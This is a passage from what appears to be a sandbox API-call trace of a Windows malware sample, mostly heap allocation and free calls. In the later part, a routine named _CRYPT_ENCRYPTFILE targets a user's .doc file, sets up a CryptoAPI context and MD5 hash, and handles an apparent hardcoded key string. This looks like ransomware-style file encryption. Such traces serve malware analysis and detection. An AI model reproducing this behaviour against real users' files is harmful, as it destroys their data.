hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0076.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0076.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0076.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0076.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb3a8 | out: hHeap=0x1780000) returned 1 [0076.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0076.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0076.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0076.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0076.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0076.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0076.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0076.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0076.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0076.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0076.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0076.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0076.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0076.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0076.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0076.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0076.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0076.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0076.628] FreeLibrary (hLibModule=0x772d0000) returned 1 [0076.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0076.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0076.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0076.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0076.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0076.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0076.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0076.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0076.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0076.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0076.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0076.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0076.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0076.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0076.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0076.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0076.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0076.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0076.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0076.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0076.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0076.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0076.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0076.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0076.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0076.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0076.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0076.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0076.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0076.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0076.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0076.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0076.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0076.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0076.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0076.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0076.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0076.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0076.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0076.630] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0076.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9818 | out: hHeap=0x1780000) returned 1 [0076.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0076.630] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0076.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0076.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0076.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0076.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0076.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0076.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0076.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0076.630] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0076.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0076.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0076.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0076.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0076.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0076.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0076.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0076.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0076.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0076.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0076.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0076.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0076.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0076.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0076.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0076.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0076.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0076.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0076.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0076.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0076.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0076.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0076.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0076.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0076.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0076.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0076.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0076.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0076.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0076.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0076.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0076.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0076.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359c08 | out: hHeap=0x1780000) returned 1 [0076.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0076.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0076.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0076.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0076.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0076.632] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9e30, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0076.632] CloseHandle (hObject=0x298) returned 1 [0076.633] FreeLibrary (hLibModule=0x772d0000) returned 1 [0076.633] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0076.633] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\eJ Z0ZcCpMN.doc", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xceb43d90, ftCreationTime.dwHighDateTime=0x1d5e94d, ftLastAccessTime.dwLowDateTime=0x547f2530, ftLastAccessTime.dwHighDateTime=0x1d5e1fa, ftLastWriteTime.dwLowDateTime=0x547f2530, ftLastWriteTime.dwHighDateTime=0x1d5e1fa, nFileSizeHigh=0x0, nFileSizeLow=0xd46d, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="eJ Z0ZcCpMN.doc", cAlternateFileName="EJZ0ZC~1.DOC")) returned 0x41ac200 [0076.633] FindClose (in: hFindFile=0x41ac200 | out: hFindFile=0x41ac200) returned 1 [0076.633] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0076.633] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.633] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0076.633] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.633] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0076.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796d88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0076.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0076.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796e88, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0076.634] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0076.634] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0076.634] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0076.635] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0076.635] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0076.635] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.638] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0076.638] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.638] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0076.639] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.639] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0076.639] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca760, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0076.639] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0076.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0076.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea0b8 [0076.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0076.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0076.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0076.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0076.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0076.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0076.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0076.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0076.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0076.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0076.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0076.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0076.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0076.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0076.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0076.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0076.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0076.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0076.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0076.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0076.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0076.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0076.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0076.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0076.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0076.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0076.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0076.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eada8 [0076.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0076.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0076.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0076.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0076.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0076.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0076.640] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0076.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0076.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0076.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0076.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0076.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0076.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0076.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0076.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0076.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0076.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0076.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0076.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0076.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0076.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e28a8 [0076.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e2ae8 [0076.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0076.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0076.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e2bd8 [0076.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0076.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0076.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0076.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0076.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0076.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0076.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0076.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0076.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a48 [0076.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796d88 [0076.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0076.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0076.642] 